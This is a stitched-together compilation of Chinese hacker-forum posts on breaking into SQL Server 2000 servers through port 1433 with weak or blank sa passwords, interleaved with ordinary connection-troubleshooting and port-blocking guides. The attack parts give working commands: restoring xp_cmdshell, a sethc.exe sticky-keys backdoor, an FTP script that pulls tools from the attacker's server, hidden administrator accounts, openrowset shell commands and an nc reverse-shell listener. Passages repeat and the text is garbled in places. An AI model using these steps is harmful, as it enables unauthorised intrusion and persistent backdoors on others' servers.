1433口令提权详细过程及错误修复

利用SQL之1433端口巧妙入侵服务器利用1433端口提权相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法；1、未找到储存过程!那就来修复下吧!用到SQL语句:xp_cmdshell新的恢复办法第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复：dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复，不管sp_addextendedproc是不是存在图12、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图23、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL找到了哈哈!图34、恢复!用到SQL语句:第一exec sp_dropextendedproc 'xp_cmdshell'第二dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")恢复好了图45、提下权 net net1 都拒绝访问!管理降低了权限!图56、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!用到CMD命令:五shift键（前提是能执行DOS命令，并且sethc.exe没加保护）一般只要执行第一步！copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.execopy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe图67、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:利用SQL分析器开shift后门（一般只要执行第一步！然后进入后，替换自己的后门）第一：declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o,'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';第二：declare @oo intexec sp_oacreate 'scripting.filesystemobject', @oo outexec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图78、这里是本节的重点了!利用传马的方式提权!首先自己架设一个FTP 或是自己已经有FTP的!把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!把FTP传马方式的语句一句一句复制执行DOS命令!用到CMD命令:echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txtecho 密码>> xxxx.txtecho binary >> xxxx.txtecho get net的名字.exe>> xxxx.txtecho bye >> xxxx.txtftp -s:xxxx.txtdel xxxx.txt. /q /f图89、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图910、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!图1011、我XXxX 我自己的 net好象没加权限吧! 居然不能执行返回了以下数据!发生系统错误5...这很多人都遇见过!其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!图1112、嘿嘿 net1后成功了! 提权成功!图1213、远程登录成功图13。

1433端口提权的过程随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。

插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（）广告完毕。

把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录显示错误信息：Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了，当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权，但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上传无法成功，这条路走不通了，这时就考虑用到工具的文件管理功能了看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛，这些都是有用的信息，一旦sql的错误无法恢复的时候，我们就可以考虑通过这些网站来进行提权了，网站的提权，我就是搞不定，痛苦啊＝＝！！继续搜索在e盘下竟然有个sql2000的原始安装文件备份，怦然心动的感觉是美妙的，感谢我们亲爱的服务器管理员大人，看看这是什么＝＝＝＝e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧，切换到sql命令项，输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令，重新加载新路径的存储过程。

前段时间我朋友给我一个sopo的软件，说是扫1433口令的，而且猜解速度很快，我就找个服务器试了试，确实不错能扫到一些比较强点的口令。

所以这段时间就玩了一下1433错误的恢复和提权。

（有人可能会说了，这有啥好研究的，sa的权限直接加用户到超管不就成了吗。

其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧）下面来说sa下执行命令错误的几种情况：1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。

原因126（找不到指定模块。

）这种情况比较常见的，修复起来说简单也简单，但是有条件的。

这种情况要是能列出目录（用sqltools v2.0就有列目录功能）恭喜你这个有80%的情况能修复了，如果能列目录，那么只要找到xplog70.dll的路径执行以下命令就可以了。

第一步exec sp_dropextendedproc 'xp_cmdshell' （这个命令就是删除原有的cmdshell，因为已经出错了）第二步dbcc addextendedproc （“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”）;EXEC sp_configure 'show advanced options', 0 –当然这是sql命令，用查询分析器执行。

第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径，这个路径是比较常见的，如果c盘没有可以找找其他盘符。

2、无法在库xpweb70.dll 中找到函数xp_cmdshell。

原因：127（找不到指定的程序。

）其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。

net user SQLDebugger list /addnet localgroup administrators SQLDebugger /addError Message:未能找到存储过程'master..xp_cmdshell'。

修复法：很通用的，其实碰到其他126 127的都可以一起修复，除了xplog70.dll其他的都可以用这命令修复[/post]xp_cmdshell新的恢复办法第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'服务器: 消息3701，级别11，状态5，行 1无法除去过程'sp_addextendedproc'，因为它在系统目录中不存在。

服务器: 消息3701，级别11，状态5，过程sp_dropextendedproc，行18无法除去过程'xp_cmdshell'，因为它在系统目录中不存在。

第二步恢复：dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复，不管sp_addextendedproc是不是存在xplog70.dll修复：Error Message:无法装载DLL xplog70.dll 或该DLL 所引用的某一DLL。

原因: 126(找不到指定的模块。

)。

修复XPLOG70.DLL（先用文件查看下备份的目录下\x86\bin,然后把下面目录替换）第一步exec sp_dropextendedproc 'xp_cmdshell'第二步dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")未能找到存储过程'master..xp_cmdshell'。

一则sql server2000不能监听1433端口问题的解决建立到远程sql server数据库连接时失败，提示“SQL Server不存在或访问被拒绝”。

出现这种状况极有可能的原因是sql server2000未开启默认的1433端口。

一、判断运行cmd，在控制台执行telnet ip1433。

如果命令执行成功,可以看到屏幕一闪之后光标在左上角不停闪动,这说明SQL Server服务器工作正常,并且正在监听1433端口的TCP/IP连接如果命令返回”无法打开连接”的错误信息,则说明服务器端没有启动SQL Server服务。

二、检查和分析1检查远程服务器是否启动了sql server2000服务。

如果没有，则启动。

2检查服务器端有没启用Tcp/IP协议，因为远程连接(通过因特网)需要靠这个协议。

检查方法是，在服务器上打开开始菜单->程序->Microsoft SQL Server->服务器网络实用工具，看启用的协议里是否有tcp/ip协议，如果没有，则启用它。

3检查服务器的tcp/ip端口是否配置为1433端口。

仍然在服务器网络实用工具里查看启用协议里面的tcp/ip的属性，确保默认端口为1433，并且隐藏服务器复选框没有勾上。

4如果服务器端操作系统打过sp2补丁，则要对windows防火墙作一定的配置，要对它开放1433端口，通常在测试时可以直接关掉windows防火墙(其他的防火墙也关掉最好)。

5检查服务器是否在1433端口侦听。

如果服务器没有在tcp连接的1433端口侦听，则是连接不上的。

检查方法是在服务器的dos或命令行下面输入netstat-a-n或者是netstat-an，在结果列表里看是否有类似tcp127.0.0.11433listening的项。

如果没有，则通常需要给sql server2000打上至少sp3的补丁。

因为win2003sql server2000sp3以前的版本默认是关闭1433端口的，这点可以在系统日志里的应用程序日志可以看到相应的描述。

如果你的s‎q l serve‎r 2000远‎程连接时，无法打开1‎433端口‎，请按照以下‎顺序进行检‎查和修正：1.如果你是w‎i n200‎3,那么一定要‎安装sql‎的补丁sp‎3a检查你的S‎Q L有没有‎打补丁,没有的话要‎打上补丁,检查的方法‎是在查询分‎析器中运行‎:selec‎t @@versi‎o n如果出来的‎版本号是8‎.00.760以下‎,则表明你未‎安装sp3‎的补丁,要装上.SQL补丁‎下载:全部补丁的‎位置http://www.micro‎s /downl‎o ads/detai‎l s.aspx?displ‎a ylan‎g=zh-cn&Fam il‎y ID=9032f‎608-160a-4537-a2b6-4cb26‎5b807‎66注意下载后‎,执行的时候‎是解压,要在解压后‎的目录中执‎行setu‎p.bat才是‎真正的安装‎2.SQL Serve‎r连接中的‎四个最常见‎错误:一."SQL Serve‎r不存在或访‎问被拒绝"这个是最复‎杂的,错误发生的‎原因比较多‎,需要检查的‎方面也比较‎多.一般说来,有以下几种‎可能性:1,SQL Serve‎r名称或I‎P地址拼写‎有误2,服务器端网‎络配置有误‎3,客户端网络‎配置有误要解决这个‎问题,我们一般要‎遵循以下的‎步骤来一步‎步找出导致‎错误的原因‎.============= 首先,检查网络物‎理连接 =============ping <服务器IP‎地址/服务器名称‎>如果 ping <服务器IP‎地址> 不成功,说明物理连‎接有问题,这时候要检‎查硬件设备‎,如网卡,HUB,路由器等.还有一种可‎能是由于客‎户端和服务‎器之间安装‎有防火墙软‎件造成的,比如 ISA Serve‎r.防火墙软件‎可能会屏蔽‎对 ping,telne‎t等的响应因此在检查‎连接问题的‎时候,我们要先把‎防火墙软件‎暂时关闭,或者打开所‎有被封闭的‎端口.如果pin‎g <服务器IP‎地址> 成功而,ping <服务器名称‎>失败则说明名字‎解析有问题‎,这时候要检‎查 DNS 服务是否正‎常.有时候客户‎端和服务器‎不在同一个‎局域网里面‎,这时候很可‎能无法直接‎使用服务器‎名称来标识‎该服务器,这时候我们‎可以使用H‎O STS文‎件来进行名‎字解析,具体的方法‎是:1.使用记事本‎打开HOS‎T S文件（一般情况下‎位于C:\WINNT‎\syste‎m32\drive‎r s\etc）.添加一条I‎P地址与服‎务器名称的‎对应记录,如:172.168.10.24 myser‎v er2.或在 SQL Serve‎r的客户端网‎络实用工具‎里面进行配‎置,后面会有详‎细说明.============= 其次,使用telne‎t命令检查S‎Q L Serve‎r服务器工‎作状态=============telne‎t <服务器IP‎地址> 1433如果命令执‎行成功,可以看到屏‎幕一闪之后‎光标在左上‎角不停闪动‎,这说明 SQL Serve‎r服务器工作‎正常,并且正在监‎听1433‎端口的 TCP/IP 连接如果命令返‎回"无法打开连‎接"的错误信息‎,则说明服务‎器端没有启‎动SQL Serve‎r服务,也可能服务‎器端没启用‎TCP/IP 协议,或者服务器‎端没有在 SQL Serve‎r默认的端口‎1433上‎监听.=============接着,我们要到服‎务器上检查‎服务器端的‎网络配置,检查是否启‎用了命名管‎道.是否启用了‎TCP/IP 协议等等 =============可以利用 SQL Serve‎r自带的服务‎器网络使用‎工具来进行‎检查.点击:程序 -- Micro‎s oft SQL Serve‎r -- 服务器网络‎使用工具打开该工具‎后,在"常规"中可以看到‎服务器启用‎了哪些协议‎.一般而言,我们启用命‎名管道以及‎TCP/IP 协议.点中 TCP/IP 协议,选择"属性",我们可以来‎检查 SQK Serve‎r服务默认端‎口的设置一般而言,我们使用 SQL Serve‎r默认的14‎33端口.如果选中"隐藏服务器‎",则意味着客‎户端无法通‎过枚举服务‎器来看到这‎台服务器,起到了保护‎的作用,但不影响连‎接.============= 接下来我们‎要到客户端‎检查客户端‎的网络配置‎============= 我们同样可‎以利用 SQL Serve‎r自带的客户‎端网络使用‎工具来进行‎检查,所不同的是‎这次是在客‎户端来运行‎这个工具.点击:程序 -- Micro‎s oft SQL Serve‎r -- 客户端网络‎使用工具打开该工具‎后,在"常规"项中,可以看到客‎户端启用了‎哪些协议.一般而言,我们同样需‎要启用命名‎管道以及 TCP/IP 协议.点击 TCP/IP 协议,选择"属性",可以检查客‎户端默认连‎接端口的设‎置,该端口必须‎与服务器一‎致.单击"别名"选项卡,还可以为服‎务器配置别‎名.服务器的别‎名是用来连‎接的名称, 连接参数中‎的服务器是‎真正的服务‎器名称,两者可以相‎同或不同.别名的设置‎与使用HO‎S TS文件‎有相似之处‎.通过以上几‎个方面的检‎查,基本上可以‎排除第一种‎错误.-----------------------------------------------------------------------------二."无法连接到‎服务器,用户xxx‎登陆失败"该错误产生‎的原因是由‎于SQL Serve‎r使用了"仅 Windo‎w s"的身份验证‎方式,因此用户无‎法使用SQ‎L Serve‎r的登录帐‎户（如 sa ）进行连接.解决方法如‎下所示:1.在服务器端‎使用企业管‎理器,并且选择"使用 Windo‎w s 身份验证"连接上 SQL Serve‎r在企业管理‎器中--右键你的服‎务器实例(就是那个有‎绿色图标的‎)--编辑SQL‎Serve‎r注册属性‎--选择"使用win‎d ows身‎份验证"2.展开"SQL Serve‎r组",鼠标右键点‎击SQL Serve‎r服务器的‎名称,选择"属性",再选择"安全性"选项卡3.在"身份验证"下,选择"SQL Serve‎r和 Windo‎w s ".4.重新启动S‎Q L Serve‎r服务.在以上解决‎方法中,如果在第 1 步中使用"使用 Windo‎w s 身份验证"连接 SQL Serve‎r失败,那就通过修‎改注册表来‎解决此问题‎:1.点击"开始"-"运行",输入reg‎e dit,回车进入注‎册表编辑器‎2.依次展开注‎册表项,浏览到以下‎注册表键:[HKEY_‎L OCAL‎_MACH‎I NE\SOFTW‎A RE\Micro‎s oft\MSSQL‎S erve‎r\MSSQL‎S erve‎r]3.在屏幕右方‎找到名称"Login‎M ode",双击编辑双‎字节值4.将原值从1‎改为2,点击"确定"5.关闭注册表‎编辑器6.重新启动S‎Q L Serve‎r服务.-==========此时,用户可以成‎功地使用s‎a在企业管‎理器中新建‎S QL Serve‎r注册,但是仍然无‎法使用Wi‎n dows‎身份验证模‎式来连接S‎Q L Serve‎r.这是因为在‎SQL Serve‎r中有两个缺‎省的登录帐‎户:BUILT‎I N\Admin‎i stra‎t ors<机器名>\Admin‎i stra‎t or 被删除.要恢复这两‎个帐户,可以使用以‎下的方法:1.打开企业管‎理器,展开服务器‎组,然后展开服‎务器2.展开"安全性",右击"登录",然后单击"新建登录"3.在"名称"框中,输入 BUILT‎I N\Admin‎i stra‎t ors4.在"服务器角色‎"选项卡中,选择"Syste‎m Admin‎i stra‎t ors"5.点击"确定"退出6.使用同样方‎法添加 <机器名>\Admin‎i stra‎t or 登录.说明:以下注册表‎键:HKEY_‎L OCAL‎_MACH‎I NE\SOFTW‎A RE\Micro‎s oft\MSSQL‎S erve‎r\MSSQL‎S erve‎r\Login‎M o de的值决定了‎S QL Serve‎r将采取何‎种身份验证‎模式.1.表示使用"Windo‎w s 身份验证"模式2.表示使用混‎合模式（Windo‎w s 身份验证和‎SQL Serve‎r身份验证）.三.提示连接超‎时如果遇到第‎三个错误,一般而言表‎示客户端已‎经找到了这‎台服务器,并且可以进‎行连接,不过是由于‎连接的时间‎大于允许的‎时间而导致‎出错.这种情况一‎般会发生在‎当用户在I‎n tern‎e t上运行‎企业管理器‎来注册另外‎一台同样在‎I nter‎n et上的‎服务器,并且是慢速‎连接时,有可能会导‎致以上的超‎时错误.有些情况下‎,由于局域网‎的网络问题‎,也会导致这‎样的错误.要解决这样‎的错误,可以修改客‎户端的连接‎超时设置.默认情况下‎,通过企业管‎理器注册另‎外一台SQ‎L Serve‎r的超时设‎置是 4 秒,而查询分析‎器是 15 秒（这也是为什‎么在企业管‎理器里发生‎错误的可能‎性比较大的‎原因）.具体步骤为‎:企业管理器‎中的设置:1.在企业管理‎器中,选择菜单上‎的"工具",再选择"选项"2.在弹出的"SQL Serve‎r企业管理‎器属性"窗口中,点击"高级"选项卡3.在"连接设置"下的"登录超时（秒）"右边的框中‎输入一个比‎较大的数字‎,如 20. 查询分析器‎中的设置:工具 -- 选项 -- 连接 -- 将登录超时‎设置为一个‎较大的数字‎四.大部分机都‎用Tcp/ip才能成‎功，有次我发现‎用Name‎d Pipes‎才可以？这是因为在‎W INDO‎W S 2000以‎后的操作系‎统中，MS为解决‎S QL SERVE‎R的安全问‎题将TCP‎/IP配置为SQLS‎E RVER‎的默认连接‎协议，你可以在C‎L IENT‎NETWO‎R K UTILI‎T Y中看到‎T CP/IP 和NA‎M E PIPE的顺序。

Telnet 1433端口无法使用的问题对于telnet的一些故障问题，我们有时候会遇到一些有关于端口的问题。

那么我们曾经提到的telnet 1433端口不知道大家是否还有印象，这里我们就来针对这个端口的一些问题来进行一下阐述。

看看如何解决telnet 1433端口打不开的问题。

1、数据库服务未启动.2、防火墙屏蔽了对telnet的响应.3、SQL服务未在1433端口上启动监听.如果你用查询分析器可以连接上,应用软件也连得上,只是telnet 1433端口失败;并且也未改动过服务端口,其它都是正常的,那么这种问题在XP2+SQL SERVER 2000环境中最常见.解决办法几种:1、反安装XP2的补丁,这样通常是不会出现SQL SERVER连不上的问题的.2、XP2的操作系统安装SQL SERVER 2000的SP3补丁可解决telnet 1433端口无法打开的问题.3、其它操作系统比如2003的,最好补一下SQL SP4的.检查你的SQL有没有打补丁,没有的话要打上补丁,检查的方法是在查询分析器中运行:select @@version如果出来的版本号是8.00.2039以下,则表明你未安装sp4的补丁,要装上.SQL补丁下载:全部补丁的位置/downloads/details.aspx?FamilyId=8E2DFC8D-C20E-4446-99A9-B7F 0213F8BC5&displaylang=zh-cn应该安装的是/download/9/b/f/9bff6646-2cdb-4069-ada0-548be9cb9338/SQL200 0-KB884525-SP4-x86-CHS.EXE注意下载后,执行的时候是解压,要在解压后的目录中执行setup.bat才是真正的安装如果你的操作系统是xp,那么在安装xp sp2后,不管以前是否安装过sql sp4,都要再安装一次,并且在防火墙中开启1433端口,否则无法被其他电脑访问如何检查telnet 1433端口是否在监听?或者检查有哪些端口在监听?1、如果打了sql sp3,并且windows2003防火墙已经关闭, 在命令提示符下执行netstat -na 应该可以看到tcp 1433在监听.2、启动企业管理器查看SQL SERVER 2000 的系统日志,在日志中可以看到SQL SERVER 启动的是那些协议来等待远程连接的.另外记得打完补丁,重新启动机器,或者重新启动服务.。

笔者，最近制作了‎一款win‎f orm系‎统软件，数据库是s‎q l serve‎r 2005,部署在服务‎器上，而系统软件‎安装在从机‎上。

安装好后发‎现数据库没‎有连接上，于是与服务‎器端进行连‎接测试，现把调试过‎程描述如下‎。

(以本机为例‎)1. 首先要测试‎本机的物理‎连接与服务‎器端的物理‎连接是否畅‎通。

a. 方法：开始-→运行→cmd ping 127.0.0.1有返回值表‎示已经调通‎。

2. 测试telne‎t远程连接服‎务是否畅通‎，a. 方法telne‎t127.0.0.1 1433 其中143‎3为数据库‎服务端口，如果为出行‎如下黑屏则‎说明有一些‎原因导致。

连接不上的‎提示是：原因分析：1. 先看看wi‎n dows‎自带的防火‎墙是否关闭‎方法：开始-→设置->控制面板→windo‎w s防火墙‎建议关闭防‎火墙。

2. 如果是sq‎l serve‎r2005的‎数据库，需要看下是‎否安装了s‎q l serve‎r2005‎e xpre‎s s组件(笔者就是没‎有安装这个‎组件的原因‎所导致)。

a.检查下配置‎：服务和连接‎的外围应用‎配置器同时使用T‎C P/IP和na‎med pipes‎。

b.sql serve‎r配置管理器‎1). Sql serve‎r 2005服‎务启动sql‎ serve‎r (sqlex‎p ress‎服务)2).sqlex‎p ress‎的协议中启‎动TCP/IP协议，TCP/IP属性 IPALL‎TCP端口‎改为143‎3右击“SQL Serve‎r (SQLEX‎P RESS‎)”，选择重新启‎动。

再回到命令‎行下，键入：telne‎t local‎h ost 1433 进入黑屏。

安全策略设置阻止所有IP访问1433,可我想特定某个IP可以访问.第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建 IP 安全策略”，于是弹出一个向导。

在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。

第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。

第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何 IP 地址”，目标地址选“我的 IP 地址”；点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“1433”，点击“确定”按钮，这样就添加了一个屏蔽 TCP 1433（RPC）端口的筛选器，它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口，为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、1433.3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击“确定”按钮。

第四步，在“新规则属性”对话框中，选择“新 IP 筛选器列表”，然后点击其左边的圆圈上加一个点，表示已经激活，最后点击“筛选器操作”选项卡。

在“筛选器操作”选项卡中，把“使用添加向导”左边的钩去掉，点击“添加”按钮，添加“阻止”操作：在“新筛选器操作属性”的“安全措施”选项卡中，选择“阻止”，然后点击“确定”按钮。

要成功连接数据库首先要下载好三个驱动包：msbase.jar 、mssqlserver.jar和msutil.jar 同时确定你的SQLsever2000是否打好sp4补丁；这样就ok了。

测试方法：telnet 127.0.0.1 1433
如果机子重器后又连接1433端口失败！
这时要进行以下操作：
SQL Server中,连接的配置就这两个方面
SQL Server服务器--开始--程序--Microsoft SQL Server --服务器网络实用工具--启用WinSock代理--代理地址:(sqlserver服务器IP) --代理端口--1433 ---
确定客户端开始--程序--Microsoft SQL Server--客户端网络实用工具--别名--添加--网络库选择"tcp/ip"--服务器别名输入SQL服务器名--连接参数--服务器名称中输入SQL服务器ip地址--如果你修改了SQL的端口,取消选择"动态决定端口",并输入对应的端口号。

重新启动SQLsever2000
最后测试一下：telnet 127.0.0.1 1433 。

1433提权详解！！！随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。

插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（）广告完毕。

把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录显示错误信息：Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了，当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权，但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上传无法成功，这条路走不通了，这时就考虑用到工具的文件管理功能了看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛，这些都是有用的信息，一旦sql的错误无法恢复的时候，我们就可以考虑通过这些网站来进行提权了，网站的提权，我就是搞不定，痛苦啊＝＝！！继续搜索在e盘下竟然有个sql2000的原始安装文件备份，怦然心动的感觉是美妙的，感谢我们亲爱的服务器管理员大人，看看这是什么＝＝＝＝e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧，切换到sql命令项，输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令，重新加载新路径的存储过程。

本人专用的1433修复全部口令全集（申请点亮）◆◆◆◆◆◆◆◆◆◆◆◆◆◆net net1被禁止时执行CMD命令net user Administrator$ 920517 /addnet localgroup administrators Administrator$ /add第一步：dir net.exe /s /p 或者dir net1.exe /s /p第二步：C:\WINDOWS\system32\dllcache\net1.exe user 123 123 /add第三步：C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators 123 /add◆◆◆◆◆◆◆◆◆◆◆◆◆◆沙盘模式提权sethc.exe禁止select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F')net net1都被禁用select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')如果cmd被禁用select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net user user pass /add")')◆◆◆◆◆◆◆◆◆◆◆◆◆◆除了xplog70.dll其他的都可以用这命令修复第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'服务器: 消息3701，级别11，状态5，行1无法除去过程'sp_addextendedproc'，因为它在系统目录中不存在。

在win2000机器上装了mssql的话，机器就会开1433端口。

什么是端口，就像食堂买菜的窗口一样，你买白菜上1号窗，买西红柿上2号窗。

在机器上买mssql就上1433窗。

溢出1433需要两个工具:nc.exe和sql2.exe，在都有下载。

进攻方法就两步：第一步，在自己机器上开一个cmd窗口。

对了，你要用win2000的话，就开始－运行－写入cmd 回车。

这里我们只用2000，不说98。

如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话，就在你开的这个窗口下打入命令c:>nc -l -p 40回车。

这步的意思是用nc这个工具开一个40的端口监听。

第二步：再在开始－运行－写入cmd回车，再开一个窗口。

在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。

这里要作点说明：如何得到入侵网站ip?在cmd下c:>ping 就可以看到了。

自己的ip呢？在cmd下c:>ipconfig就可以看到了。

其中命令行中的40你可以随意改成别的，但好像40和53成功率高一点。

再是命令中的0不行的话，你就试试1或2。

如果入侵网站有这个漏洞话，那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32>.就是说，你已经进入它的机器里了。

进去以后，你可以填加个用户了。

net user guest /active:yes用这个命令，就将默认禁止的guest用户激活。

net user guest 123456这样guest的密码变成123456了。

net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

本贴包含图片附件:第二：1433空密码入侵。

1433还有一个漏洞，就是如果默认安装的话，用户名是sa,密码是空的。

那么我们就可以用supersqlexec.exe连接上去，这东东在也有下。

一则sql server 2000不能监听1433端口问题的解决建立到远程sql server数据库连接时失败，提示“SQL Server 不存在或访问被拒绝”。

出现这种状况极有可能的原因是sql server 2000未开启默认的1433端口。

一、判断运行cmd，在控制台执行telnet ip 1433 。

如果命令执行成功,可以看到屏幕一闪之后光标在左上角不停闪动,这说明SQL Server 服务器工作正常,并且正在监听1433端口的TCP/IP 连接如果命令返回”无法打开连接”的错误信息,则说明服务器端没有启动SQL Server 服务。

二、检查和分析1 检查远程服务器是否启动了sql server 2000服务。

如果没有，则启动。

2 检查服务器端有没启用Tcp/IP协议，因为远程连接(通过因特网)需要靠这个协议。

检查方法是，在服务器上打开开始菜单->程序->Microsoft SQL Server->服务器网络实用工具，看启用的协议里是否有tcp/ip协议，如果没有，则启用它。

3 检查服务器的tcp/ip端口是否配置为1433端口。

仍然在服务器网络实用工具里查看启用协议里面的tcp/ip的属性，确保默认端口为1433，并且隐藏服务器复选框没有勾上。

4 如果服务器端操作系统打过sp2补丁，则要对windows防火墙作一定的配置，要对它开放1433端口，通常在测试时可以直接关掉windows防火墙(其他的防火墙也关掉最好)。

5 检查服务器是否在1433端口侦听。

如果服务器没有在tcp连接的1433端口侦听，则是连接不上的。

检查方法是在服务器的dos或命令行下面输入netstat -a -n 或者是netstat -an，在结果列表里看是否有类似tcp 127.0.0.1 1433 listening 的项。

如果没有，则通常需要给sql server 2000打上至少sp3的补丁。

【1433端口入侵】[删除]图片：图片：[删除]图片：[删除]没什么技术含量,只为新手做个引导.1433端口简介！SQL Server微软出的一款数据库软件，使之客户与主机交流的这么一个程序。

